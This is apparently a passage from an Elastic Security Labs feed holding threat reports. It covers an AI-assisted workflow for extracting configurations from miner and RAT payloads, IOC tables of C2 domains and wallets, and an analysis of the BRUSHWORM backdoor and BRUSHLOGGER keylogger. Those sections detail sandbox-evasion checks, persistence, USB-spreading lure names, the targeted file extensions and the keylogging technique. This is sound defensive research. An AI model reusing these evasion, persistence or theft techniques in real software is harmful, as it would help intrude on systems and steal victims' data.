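<p>Conceptually, the chain tracking reduces to a simple graph walk. The sketch below is a minimal illustration of that traversal; the <code>relations</code> mapping is a hypothetical stand-in for the dropped-file/embedded-file relationships that would, in practice, be fetched from the VirusTotal API:</p>
<pre><code class="language-python">def walk_chain(start_hash, relations, max_depth=50):
    """Follow drop/embed links until no further payload is recorded.

    relations maps a file hash to the hash of the file it drops or
    embeds (a stand-in for VirusTotal relationship lookups). Returns
    the full chain from the starting hash down to the final payload.
    """
    chain = [start_hash]
    current = start_hash
    for _ in range(max_depth):  # depth cap also guards against cycles
        nxt = relations.get(current)
        if nxt is None or nxt in chain:
            break
        chain.append(nxt)
        current = nxt
    return chain

# Example: an ISO drops a loader, which drops the final payload
relations = {"iso_hash": "loader_hash", "loader_hash": "payload_hash"}
print(walk_chain("iso_hash", relations))  # last element is the final tracked file
</code></pre>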
<h4>Download and Extraction</h4>
<p>Once the triage file was created, we downloaded the intermediate payloads and instructed Claude to start the automatic payload/configuration extraction process. To do this, we installed an OpenSSH server on a Windows virtual machine, then created a Claude skill containing instructions to connect to this machine and use the installed tools to perform the reverse engineering and extraction workflow.</p>
<p>The workflow is simple: Claude connects to the machine, uploads the sample, detects whether it is obfuscated or packed with Detect It Easy, and applies the appropriate deobfuscation tool until the sample is no longer obfuscated (Unlicense, .NET Reactor Slayer). It then runs the developed extraction scripts to identify what the sample is and determine the next step: either continue extraction with the child payload if the parent is a loader, or store the configuration information for the final report.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image19.png" alt="Payload/Configuration extraction Claude skill" title="Payload/Configuration extraction Claude skill" /></p>
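<p>The workflow can be summarized as a small control loop. The sketch below is illustrative only: <code>detect_packer</code>, <code>deobfuscate</code>, and <code>extract</code> are hypothetical stand-ins for Detect It Easy, the deobfuscation tools (Unlicense, .NET Reactor Slayer), and the extraction scripts:</p>
<pre><code class="language-python">def process_sample(sample, detect_packer, deobfuscate, extract, max_layers=10):
    """Illustrative control loop for the extraction workflow.

    detect_packer(sample) returns a packer/obfuscator name or None;
    deobfuscate(sample, packer) returns the cleaned sample;
    extract(sample) returns ("loader", child_sample) or ("payload", config).
    All three are hypothetical stand-ins for the tooling described above.
    """
    results = []
    queue = [sample]
    while queue:
        current = queue.pop()
        for _ in range(max_layers):  # peel obfuscation layers one by one
            packer = detect_packer(current)
            if packer is None:
                break
            current = deobfuscate(current, packer)
        kind, data = extract(current)
        if kind == "loader":
            queue.append(data)    # continue with the child payload
        else:
            results.append(data)  # store the final configuration
    return results
</code></pre>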
<p>If all the extraction scripts fail, Claude must enter Research Mode. This mode is the most enjoyable part of the skill because it gives Claude a workflow to either develop a new extraction script automatically or identify why the existing script fails against the variant. Research Mode consists of using the <a href="https://github.com/dnSpyEx">dnSpyEx</a> tool installed on the machine to decompile the sample to C#, perform a complete code analysis, and identify how to extract the payload or configuration. Claude then develops a script with this knowledge that works directly on the raw binaries for efficiency, and finally stores the knowledge for the next time it works on the same malware family.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image28.png" alt="Research mode instruction" title="Research mode instruction" /></p>
<h4>Results</h4>
<p>With the Claude Opus 4.5 model, the results were very good. Not only did Claude succeed in handling the obfuscation layers, but it also researched and developed entirely on its own, based on the CIL of the .NET binaries, the methods and scripts needed to extract the final payloads and their configurations, despite never having encountered these samples before.</p>
<p>It also demonstrated robust failure handling without requiring additional instruction. For example, when it encountered samples that could not be fully deobfuscated due to issues with Reactor Slayer, which made static extraction too difficult, it stopped processing, documented the problem, and proceeded to the next sample.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image9.png" alt="Claude entering Research Mode on extraction failure" title="Claude entering Research Mode on extraction failure" /></p>
<p>Of course, it is not without drawbacks:</p>
<ul>
<li>Once its context filled up, it often diverged onto unproductive paths and required either micro-management or a reset; hence the usefulness of a skill with reusable instructions and a knowledge base of the work already done.</li>
<li>It is slow, since every action requires it to “think”. However, the process is automatic, so that time is recovered and can be spent on something else.</li>
<li>Its token consumption is particularly heavy, especially once you notice how many inefficient actions it takes.</li>
</ul>
<h2>Observations</h2>
<p>The following tables consolidate the malware configurations extracted across the builds we investigated; they are not exhaustive:</p>
<p><strong>CNB Bot</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.1.1.</code>, <code>1.1.2.</code>, <code>1.1.3.</code>, <code>1.1.5.</code>, <code>1.1.6.</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s:</td>
<td align="left"><code>tabbysbakescodes[.]ws/CNB/gate.php</code><br /><code>tommysbakescodes[.]ws/CNB/gate.php</code><br /><code>tommysbakescodes[.]cv/CNB/gate.php</code><br /><code>win64autoupdates[.]top/CNB/gate.php</code><br /><code>autoupdatewinsystem[.]top/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Campaign/Build ID</td>
<td align="left"><code>03_26</code>, <code>25_02_26</code>, <code>15_02_26</code>, <code>1502_26</code>, <code>0502_26</code>, <code>01-26</code>, <code>frPmnr_0126</code></td>
</tr>
<tr>
<td align="left">Auth tokens</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code>, <code>020226SNDLPXSHTCSURVQ</code>, <code>0226frBLKWNYHD0FS1YWE</code>, <code>0126HRAOLQEFNGGRCXMITREQC</code></td>
</tr>
<tr>
<td align="left">Mutex</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
</tbody>
</table>
<p><strong>PureRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.3.8B</code>, <code>0.3.9</code>, <code>0.4.1</code>, <code>3.0.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>windirautoupdates[.]top</code><br /><code>winautordr.hopto[.]org</code><br /><code>winautordr.itemdb[.]com</code><br /><code>winautordr.ydns[.]eu</code><br /><code>winautordr.kozow[.]com</code><br /><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.kozow[.]com</code><br /><code>wndlogon.ydns[.]eu</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>23-01-26</code>, <code>14-01-26</code>, <code>03-01-26</code>, <code>24-12-25</code>, <code>25-11-25</code>, <code>08-11-25</code>, <code>29-01-25</code>, <code>09.11.23</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>Aesthetics135</code></td>
</tr>
</tbody>
</table>
<p><strong>PureMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>7.0.6</code>, <code>7.0.7</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.ydns[.]eu</code><br /><code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>24-10-25</code>, <code>23-11-25</code>, <code>15-09-25-MassUpdt</code>, <code>11-09-25</code>, <code>08-08-RAM</code>, <code>06-08-RAM</code>, <code>04-08-RAM</code>, <code>31-07-RAM</code>, <code>03-08-RAM</code>, <code>13-03-25</code>, <code>25-07-RAMwALL</code>, <code>25-11-25</code></td>
</tr>
<tr>
<td align="left">Wallet Address</td>
<td align="left"><code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>4c271ad41ea2f6a44ce8d0</code></td>
</tr>
</tbody>
</table>
<p><strong>Custom XMRig Loader</strong></p>
<table>
<thead>
<tr>
<th align="left">Wallet Addresses</th>
<th align="left"><code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>, <code>83sDbPzoghAX45hA2Y26xvaDsKv8TLymAGKKyZwrCKB3T9kuuYBDzb64vfy9XQyrpUFQ4r8u3V2T1EzqE6CR27XmMCCwGu1</code></th>
</tr>
</thead>
</table>
<p><strong>AsyncRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.5.8</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.ydns[.]eu</code><br /><code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>BL_Bckp_250525</code></td>
</tr>
</tbody>
</table>
<p><strong>PulsarRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.5.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code><br /><code>wndlogon.itemdb[.]com</code><br /><code>wndlogon.ydns[.]eu</code><br /><code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>18-04-25</code></td>
</tr>
</tbody>
</table>
<p><strong>SilentCryptoMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Mining Pool</th>
<th align="left"><code>gulf.moneroocean[.]stream:10128</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Wallet</td>
<td align="left"><code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code></td>
</tr>
<tr>
<td align="left">Password</td>
<td align="left"><code>CPUrig</code></td>
</tr>
<tr>
<td align="left">Mining proxy/fallback</td>
<td align="left"><code>172.94.15[.]211:5443</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softappsbase[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>autoupdatewinsystem[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softwaredatabase[.]xyz</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softappsbase[.]top/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/cpu.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softappsbase[.]top/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
</tbody>
</table>
<p>The full list of sample hashes is available in this <a href="https://gist.github.com/jiayuchann/6728db5acef7b2793a6afa77b600c7c6">GitHub Gist</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
<enclosure url="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/fake-installers-to-monero.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Elastic Security Labs uncovers BRUSHWORM and BRUSHLOGGER]]></title>
            <link>https://www.elastic.co/security-labs/brushworm-targets-financial-services</link>
            <guid>brushworm-targets-financial-services</guid>
            <pubDate>Fri, 27 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs observed two custom malware components targeting a South Asian financial institution: a modular backdoor with USB-based spreading and a DLL-side-loaded keylogger.]]></description>
            <content:encoded><![CDATA[<h2>Key takeaways</h2>
<ul>
<li>A South Asian financial institution was targeted with two custom malware components: a modular backdoor (<strong>BRUSHWORM</strong>) and a keylogger (<strong>BRUSHLOGGER</strong>)</li>
<li><strong>BRUSHWORM</strong> features anti-analysis checks, an AES-CBC encrypted configuration, scheduled task persistence, modular DLL payload downloading, USB worm propagation, and broad file theft targeting documents, spreadsheets, email archives, and source code</li>
<li>The keylogger masquerades as libcurl via DLL side-loading, capturing system-wide keystrokes with window context tracking and XOR-encrypted log files</li>
<li>Multiple earlier testing versions (<code>V1.exe</code>, <code>V2.exe</code>, etc.) were discovered on VirusTotal, some using free dynamic DNS infrastructure, indicating iterative development</li>
</ul>
<h2>Introduction</h2>
<p>During a recent investigation, Elastic Security Labs identified malware deployed on a South Asian financial institution’s infrastructure. The victim environment had only SIEM-level visibility enabled, which limited post-exploitation telemetry. The intrusion involved two custom binaries: a backdoor named <code>paint.exe</code> and a keylogger masquerading as <code>libcurl.dll</code>.</p>
<p><strong>BRUSHWORM</strong> functions as the primary implant, responsible for installation, persistence, command-and-control communication, downloading additional modular payloads, spreading via removable media, and stealing files with targeted extensions. <strong>BRUSHLOGGER</strong> supplements this by capturing system-wide keystrokes via a simple Windows keyboard hook and logging the active window context for each keystroke session.</p>
<p>Neither binary employs meaningful code obfuscation, packing, or advanced anti-analysis techniques. The overall quality of the code is low — for example, the backdoor writes its decrypted configuration to disk in cleartext before encrypting and saving a second copy, then deletes the cleartext file. Given the absence of a kill switch, the use of free dynamic DNS servers in testing versions, and some coding mistakes, we assess with moderate confidence that the author is relatively inexperienced and may have leveraged AI code-generation tools during development without fully reviewing the output.</p>
<p>Through VirusTotal pivoting, we identified what appear to be earlier development and testing versions of the backdoor uploaded under filenames such as <code>V1.exe</code>, <code>V2.exe</code>, and <code>V4.exe</code>, with varying configurations.</p>
<h2>BRUSHWORM code analysis</h2>
<p>The backdoor is the primary implant responsible for establishing persistence, communicating with the C2 server, downloading modular payloads, spreading to removable media, and exfiltrating files.</p>
<h3>Anti-analysis and sandbox detection</h3>
<p>The malware begins execution with a series of environment checks designed to detect analysis environments, though the techniques are straightforward and lack sophistication.</p>
<p><strong>Screen resolution check:</strong> If the display resolution is less than 1024×768 pixels, execution terminates immediately. This is a common sandbox detection technique.</p>
<p><strong>Username and computer name check:</strong> The malware checks whether the machine's username or the computer name is “<code>sandbox</code>”. If either matches, it terminates. These checks target default names commonly used in analysis sandboxes.</p>
<p><strong>Hypervisor detection:</strong> Using the <code>CPUID</code> instruction, the malware queries the hypervisor vendor string and compares it against the following known virtualization platforms:</p>
<table>
<thead>
<tr>
<th>Hypervisor Vendor String</th>
<th>Platform</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>VMWAREVMWARE</code></td>
<td>VMware</td>
</tr>
<tr>
<td><code>KVMKVMKVM</code></td>
<td>KVM</td>
</tr>
<tr>
<td><code>XENVMMXENVMM</code></td>
<td>Xen</td>
</tr>
<tr>
<td><code>PRL HYPERV</code></td>
<td>Parallels</td>
</tr>
<tr>
<td><code>TCGTCGTCGTCG</code></td>
<td>QEMU (TCG)</td>
</tr>
<tr>
<td><code>ACRNACRNACRN</code></td>
<td>ACRN</td>
</tr>
<tr>
<td><code>MICROSOFT HV</code></td>
<td>Hyper-V</td>
</tr>
</tbody>
</table>
<p>If a hypervisor is detected, the malware does not terminate — it merely sleeps for one second before continuing execution.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image14.png" alt="Hypervisor vendor string comparison using the CPUID instruction" title="Hypervisor vendor string comparison using the CPUID instruction" /></p>
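<p>For defenders, the vendor-string comparison reduces to a table lookup. Below is a minimal Python equivalent of the check (illustrative only; obtaining the raw vendor string requires querying CPUID leaf <code>0x40000000</code>, which is not shown here):</p>
<pre><code class="language-python"># Hypervisor vendor strings checked by BRUSHWORM (from the table above)
HYPERVISOR_VENDORS = {
    "VMWAREVMWARE": "VMware",
    "KVMKVMKVM": "KVM",
    "XENVMMXENVMM": "Xen",
    "PRL HYPERV": "Parallels",
    "TCGTCGTCGTCG": "QEMU (TCG)",
    "ACRNACRNACRN": "ACRN",
    "MICROSOFT HV": "Hyper-V",
}

def classify_hypervisor(vendor_string):
    """Return the platform name, or None when no known hypervisor matches.

    Note that on detection the malware does not exit; it merely sleeps
    for one second before continuing.
    """
    return HYPERVISOR_VENDORS.get(vendor_string.strip().upper())
</code></pre>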
<p><strong>Mouse activity check:</strong> After the initial setup, the malware monitors mouse movement for 5 minutes. If the cursor does not move during this period, execution terminates. This acts as an additional sandbox evasion measure.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image7.png" alt="Mouse movement monitoring over a 5-minute window" title="Mouse movement monitoring over a 5-minute window" /></p>
<h3>Installation and directory setup</h3>
<p>On first execution, the malware creates multiple hidden directories with hardcoded paths. These directories serve distinct roles throughout the malware's lifecycle:</p>
<table>
<thead>
<tr>
<th>Directory</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>C:\ProgramData\Photoes\Pics\</code></td>
<td>Main installation folder for the backdoor binary</td>
</tr>
<tr>
<td><code>C:\Users\Public\Libraries\</code></td>
<td>Storage for downloaded modules from the C2 server (e.g., <code>Recorder.dll</code>)</td>
</tr>
<tr>
<td><code>C:\Users\Public\AppData\Roaming\Microsoft\Vault\</code></td>
<td>Storage of the encrypted configuration file (<code>keyE.dat</code>)</td>
</tr>
<tr>
<td><code>C:\Users\Public\Systeminfo\</code></td>
<td>Staging directory for stolen files</td>
</tr>
<tr>
<td><code>C:\Users\Public\AppData\Roaming\NuGet\</code></td>
<td>Tracks exfiltrated file paths with their SHA-256 hashes (<code>hashconfig</code>)</td>
</tr>
</tbody>
</table>
<p>The misspelling &quot;Photoes&quot; (instead of &quot;Photos&quot;) is consistent across both the backdoor and keylogger components. It appears to be a genuine mistake by an author attempting to blend in with the user’s other media directories.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image4.png" alt="The malware checks whether the installation directory already exists" title="The malware checks whether the installation directory already exists" /></p>
<h3>Configuration decryption</h3>
<p>The backdoor's configuration is stored as a JSON structure with field values encrypted using AES-CBC. The AES key is hardcoded in the binary, while the initialization vector (IV) is prepended to each encrypted field's data blob.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image10.png" alt="AES-CBC decryption of configuration fields with a hardcoded key and an embedded IV" title="AES-CBC decryption of configuration fields with a hardcoded key and an embedded IV" /></p>
<p>The decrypted configuration follows this structure:</p>
<pre><code class="language-json">{
  &quot;internetCheckDomain&quot;: &quot;&lt;...&gt;&quot;,
  &quot;downloadDomain&quot;: &quot;&lt;...&gt;&quot;,
  &quot;retryCount&quot;: 0
}
</code></pre>
<p>This configuration is not referenced anywhere in the malware's operational logic. The C2 server address that the backdoor actually communicates with is a separate C++ global string stored in cleartext (<code>resources.dawnnewsisl[.]com/updtdll</code>), which is passed directly to the function responsible for C2 communication and payload downloads.<br />
<img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image11.png" alt="Download_payload function call" title="Download_payload function call" /></p>
<p>The decrypted configuration fields (<code>internetCheckDomain</code>, <code>downloadDomain</code>, <code>retryCount</code>) go entirely unused in this build. They are likely intended for a future version or a separate payload component, or were simply disabled in the deployed build, reinforcing the impression of a codebase under active, disorganized development.</p>
<h3>Persistence</h3>
<p>The malware establishes persistence by creating a Windows scheduled task named <code>MSGraphics</code> through the COM Task Scheduler interface. The task is configured to execute the malware binary each time a user logs in, ensuring the backdoor survives system reboots.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image1.png" alt="Persistence was established through a COM-based scheduled task named MSGraphics" title="Persistence was established through a COM-based scheduled task named MSGraphics" /></p>
<h3>Payload download and execution</h3>
<p>The backdoor uses the WinHTTP library to issue a <code>GET</code> request to the C2 server at the URI <code>/updtdll</code> to download a DLL payload. The downloaded binary is written to <code>C:\Users\Public\Libraries\</code> as <code>Recorder.dll</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image3.png" alt="WinHTTP GET request to /updtdll to fetch the DLL payload" title="WinHTTP GET request to /updtdll to fetch the DLL payload" /></p>
<p>We were unable to recover the downloaded payload during our investigation, but the naming convention and execution method suggest it is a modular plugin — likely providing additional post-exploitation capabilities such as screen recording or data exfiltration.</p>
<p>The downloaded DLL is executed by creating a second scheduled task, named <code>MSRecorder</code>, that uses <code>rundll32.exe</code> to load and run it. This mirrors the COM-based scheduled task creation method used for persistence.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image13.png" alt="Scheduled task created to execute the downloaded DLL via rundll32.exe" title="Scheduled task created to execute the downloaded DLL via rundll32.exe" /></p>
<p>The C2 server's SSL certificate is issued by Let's Encrypt.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image6.png" alt="Let's Encrypt SSL certificate used by the C2 server" title="Let's Encrypt SSL certificate used by the C2 server" /></p>
<h3>USB spreading and file theft</h3>
<p>Once <strong>BRUSHWORM</strong> detects that the host is already infected (by checking for the presence of the installation directory), its behavior diverges based on internet connectivity. The malware performs a connectivity check by attempting to reach <code>www.google.com</code>.</p>
<h4>Scenario 1 — Internet access available:</h4>
<p>The malware spawns two threads targeting external storage devices:</p>
<ol>
<li><strong>Removable drive infection:</strong> The backdoor copies itself to any connected removable storage devices using socially engineered filenames designed to entice victims in a corporate financial environment:
<ul>
<li><code>Salary Slips.exe</code></li>
<li><code>Notes.exe</code></li>
<li><code>Documents.exe</code></li>
<li><code>Important.exe</code></li>
<li><code>Dont Delete.exe</code></li>
<li><code>Presentation.exe</code></li>
<li><code>Emails.exe</code></li>
<li><code>Attachments.exe</code></li>
</ul>
</li>
<li><strong>File theft from removable and optical drives:</strong> Both threads enumerate files on the connected media and copy to a staging folder any file matching a broad set of targeted extensions:</li>
</ol>
<table>
<thead>
<tr>
<th>Category</th>
<th>Extensions</th>
</tr>
</thead>
<tbody>
<tr>
<td>Documents &amp; Word Processing</td>
<td><code>.doc</code>, <code>.docx</code>, <code>.dot</code>, <code>.dotx</code>, <code>.wps</code>, <code>.wpd</code>, <code>.wp</code>, <code>.rtf</code>, <code>.txt</code>, <code>.odt</code>, <code>.ott</code>, <code>.pages</code></td>
</tr>
<tr>
<td>Spreadsheets</td>
<td><code>.xls</code>, <code>.xlsx</code>, <code>.xlsm</code>, <code>.xlt</code>, <code>.xltx</code>, <code>.xlw</code>, <code>.ods</code>, <code>.ots</code>, <code>.csv</code>, <code>.tsv</code>, <code>.dbf</code>, <code>.wk1</code>, <code>.wk3</code>, <code>.wk4</code>, <code>.123</code></td>
</tr>
<tr>
<td>Presentations</td>
<td><code>.ppt</code>, <code>.pptx</code>, <code>.pot</code>, <code>.potx</code>, <code>.pps</code>, <code>.ppsx</code>, <code>.odp</code>, <code>.otp</code>, <code>.key</code>, <code>.sxi</code></td>
</tr>
<tr>
<td>Portable &amp; Layout</td>
<td><code>.pdf</code>, <code>.xps</code>, <code>.epub</code>, <code>.mobi</code>, <code>.ps</code>, <code>.prn</code>, <code>.tex</code>, <code>.latex</code>, <code>.pub</code>, <code>.p65</code>, <code>.fm</code></td>
</tr>
<tr>
<td>Archives &amp; Disk Images</td>
<td><code>.zip</code>, <code>.rar</code>, <code>.7z</code>, <code>.tar</code>, <code>.gz</code>, <code>.bz2</code>, <code>.xz</code>, <code>.iso</code>, <code>.cab</code>, <code>.arj</code>, <code>.lzh</code>, <code>.lha</code>, <code>.tgz</code>, <code>.tbz</code>, <code>.txz</code></td>
</tr>
<tr>
<td>Email &amp; Notes</td>
<td><code>.pst</code>, <code>.ost</code>, <code>.msg</code>, <code>.eml</code>, <code>.emlx</code>, <code>.mbox</code>, <code>.mbx</code>, <code>.maildir</code>, <code>.one</code></td>
</tr>
<tr>
<td>Code &amp; Data</td>
<td><code>.py</code>, <code>.md</code>, <code>.xml</code>, <code>.json</code></td>
</tr>
</tbody>
</table>
<p>Stolen files are staged in the <code>C:\Users\Public\Systeminfo\</code> directory. The malware also maintains a tracking file (<code>hashconfig</code>) at <code>C:\Users\Public\AppData\Roaming\NuGet\</code> that records each exfiltrated file's path alongside its SHA-256 hash, likely to avoid re-exfiltrating the same files on subsequent runs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image9.png" alt="Removable drive infection with lure filenames and file theft by extension" title="Removable drive infection with lure filenames and file theft by extension" /></p>
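<p>The <code>hashconfig</code> bookkeeping amounts to deduplication by digest. Below is a minimal reconstruction of that logic; only the path-plus-SHA-256 pairing is documented, so the function shape here is an assumption:</p>
<pre><code class="language-python">import hashlib

def record_and_check(path, data, seen):
    """Return True when the file is new and should be staged.

    seen maps already-exfiltrated file paths to their SHA-256 digests,
    mirroring the path/hash pairs recorded in the hashconfig file.
    """
    digest = hashlib.sha256(data).hexdigest()
    if seen.get(path) == digest:
        return False  # already exfiltrated and unchanged, skip it
    seen[path] = digest
    return True
</code></pre>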
<h4>Scenario 2 — No internet access:</h4>
<p>If the internet connectivity check fails, the malware still infects removable drives with the same lure-named copies. However, in this scenario, it additionally copies stolen files and files from the user's profile directory (matching the same extension list) to the removable drives. This behavior serves as a data exfiltration bridge for <strong>environments with restricted or air-gapped network access</strong> — using USB drives to physically carry stolen data off the network.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image12.png" alt="Offline mode: stolen files copied to removable drives for physical exfiltration" title="Offline mode: stolen files copied to removable drives for physical exfiltration" /></p>
<h2>BRUSHLOGGER code analysis</h2>
<p>The second component is a 32-bit Windows DLL (<code>4f1ea5ed6035e7c951e688bd9c2ec47a1e184a81e9ae783d4a0979501a1985cf</code>) designed for DLL side-loading. It masquerades as <code>libcurl.dll</code> by exporting seven standard <code>curl_easy_*</code> API functions, all of which are empty stubs pointing to a single <code>RET</code> instruction. The malicious functionality executes entirely from the <code>DllMain</code> entry point on <code>DLL_PROCESS_ATTACH</code>.</p>
<h3>Initialization</h3>
<p>At startup, the keylogger decodes a mutex name from a Base64-encoded string: “<code>Windows-Updates-KB852654856</code>”. The mutex name mimics a Windows Update knowledge base identifier. If <code>CreateMutexA</code> returns <code>ERROR_ALREADY_EXISTS</code>, the process terminates immediately to enforce single-instance execution.</p>
<p><strong>BRUSHLOGGER</strong> retrieves the current Windows username via <code>GetUserNameA</code>, computes its MD5 hash using the Windows CryptoAPI, and constructs the final log file path:</p>
<pre><code>C:\programdata\Photoes\&lt;username&gt;_&lt;MD5(username)&gt;.trn
</code></pre>
<p>The log file is initially created with <code>CreateFileA</code> using <code>CREATE_NEW</code>, then reopened with <code>FILE_APPEND_DATA</code> access for append-mode writing throughout the session.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image8.png" alt="Log file creation" title="Log file creation" /></p>
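<p>The log file naming can be reproduced with stdlib Python; this is a hypothetical reconstruction of the path format shown above:</p>
<pre><code class="language-python">import hashlib

def brushlogger_log_path(username):
    """Rebuild the keylogger's log path: username plus MD5(username)."""
    digest = hashlib.md5(username.encode("utf-8")).hexdigest()
    return rf"C:\programdata\Photoes\{username}_{digest}.trn"
</code></pre>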
<h3>Hook installation and message pump</h3>
<p>After file setup, the keylogger installs a low-level keyboard hook:</p>
<pre><code class="language-c">SetWindowsHookExA(WH_KEYBOARD_LL, keyboard_hook_callback, NULL, 0);
</code></pre>
<p>The <code>WH_KEYBOARD_LL</code> hook type captures keyboard input system-wide across all threads and processes. The hook procedure runs in the context of the installing thread, requiring a standard Windows message pump (<code>GetMessageA</code> / <code>TranslateMessage</code> / <code>DispatchMessageA</code>) to keep the hook alive.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image2.png" alt="Keyboard hook installation and message pump" title="Keyboard hook installation and message pump" /></p>
<h3>Keystroke capture logic</h3>
<p>The core capture logic resides in the hook callback, which processes every keyboard event in the system.</p>
<p>For each keystroke event, the callback:</p>
<ol>
<li>Retrieves the foreground window handle via <code>GetForegroundWindow</code></li>
<li>Allocates memory via <code>VirtualAlloc</code> for the window title</li>
<li>Captures the current timestamp via <code>GetLocalTime</code>, formatted as <code>DD-MM-YYYY HH:MM</code></li>
<li>Retrieves the window title bar text via <code>GetWindowTextA</code></li>
</ol>
<p>When the foreground window changes, a context marker is appended to the keystroke buffer:</p>
<pre><code>\n&lt;timestamp&gt; &lt;window title&gt;\n
</code></pre>
<p><strong>Keystroke encoding:</strong> The callback processes <code>WM_KEYDOWN</code>, <code>WM_SYSKEYDOWN</code>, <code>WM_KEYUP</code>, and <code>WM_SYSKEYUP</code> messages. Each keystroke is logged as a two-digit hexadecimal virtual-key code.</p>
<h3>XOR-encrypted log files</h3>
<p>The flush routine copies the keystroke buffer to a local stack buffer, XOR-encrypts each byte with a hardcoded single-byte key <code>0x43</code>, and writes the result to the log file via <code>WriteFile</code>. After a successful write, the global buffer is cleared.</p>
<p>The XOR key <code>0x43</code> is trivially reversible — the encryption serves only as basic obfuscation rather than meaningful cryptographic protection.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image5.png" alt="XOR decrypting a keylogger file with the byte 0x43" title="XOR decrypting a keylogger file with the byte 0x43" /></p>
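<p>Recovering keystrokes from a captured log is therefore a two-step process: XOR every byte with <code>0x43</code>, then interpret the two-digit hex virtual-key codes. The decoder below is a minimal sketch; it maps only letters and digits, whose virtual-key codes equal their ASCII values, and leaves everything else as a bracketed hex code:</p>
<pre><code class="language-python">def decrypt_log(blob):
    """Undo the single-byte XOR applied by the flush routine."""
    return bytes(b ^ 0x43 for b in blob)

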